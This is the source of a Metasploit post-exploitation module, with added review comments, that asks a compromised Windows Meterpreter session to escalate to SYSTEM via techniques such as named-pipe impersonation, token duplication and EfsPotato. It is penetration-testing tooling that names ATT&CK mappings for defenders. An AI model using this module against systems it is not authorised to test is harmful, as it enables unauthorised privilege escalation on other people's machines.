Path: blob/master/modules/post/windows/escalate/getsystem.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# NOTE(review): nothing in this file references Metasm by name; confirm whether
# this require is still needed before removing it.
require 'metasm'

# Post module that asks an existing Windows Meterpreter session to elevate
# itself to the SYSTEM account through the session's `getsystem` command.
#
# The module self-declares two ATT&CK mappings in 'References' (T1068 and
# T1548.002), which is the metadata a defender would use to line this activity
# up with existing detections.
class MetasploitModule < Msf::Post
  # presumably the source of `is_system?` used in #run -- confirm against the mixin
  include Msf::Post::Windows::Priv

  # Registers the module metadata and its single user-facing option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Escalation',
        'Description' => %q{
          This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various
          techniques.
        },
        'License' => MSF_LICENSE,
        'Author' => 'hdm',
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION],
          ['ATT&CK', Mitre::Attack::Technique::T1548_002_BYPASS_USER_ACCOUNT_CONTROL]
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[priv_elevate_getsystem]
          }
        },
        'Notes' => {
          'AKA' => [
            'Named Pipe Impersonation',
            'Token Duplication',
            'RPCSS',
            'PrintSpooler',
            'EFSRPC',
            'EfsPotato'
          ],
          'Stability' => [CRASH_SAFE],
          # NOTE(review): both lists below are declared empty. Confirm against
          # the techniques named in 'AKA' whether any of them leave host
          # artifacts (services, files, event-log entries) so this metadata
          # matches what would actually be observable on the target.
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    # 0 (the default) means "try every technique"; the help text advertises 1-6.
    # NOTE(review): no range check is applied to this value anywhere in the file.
    register_options(
      [
        OptInt.new('TECHNIQUE', [false, 'Specify a particular technique to use (1-6), otherwise try them all', 0])
      ]
    )
  end

  # Reports that the session's platform/architecture is not handled and stops
  # the run by raising Rex::Script::Completed.
  #
  # @raise [Rex::Script::Completed] always
  def unsupported
    print_error('This platform is not supported with this script!')
    raise Rex::Script::Completed
  end

  # Entry point: validates the session, skips work if it is already SYSTEM,
  # otherwise requests elevation and reports the outcome.
  #
  # @return [void]
  def run
    requested = datastore['TECHNIQUE'].to_i

    # Only Windows sessions on x64 or x86 are accepted; anything else aborts.
    unsupported unless client.platform == 'windows' && [ARCH_X64, ARCH_X86].include?(client.arch)

    if is_system?
      print_good('This session already has SYSTEM privileges')
      return
    end

    begin
      outcome = client.priv.getsystem(requested)
      # NOTE(review): only element 1 of the result is read and success is
      # reported unconditionally. If getsystem can return without raising when
      # elevation did not happen, this message would be wrong -- confirm the
      # return contract (or re-check is_system?) before trusting this output.
      used_technique = outcome[1]
      print_good("Obtained SYSTEM via technique #{used_technique}")
    rescue Rex::Post::Meterpreter::RequestError
      print_error('Failed to obtain SYSTEM access')
    end
  end
end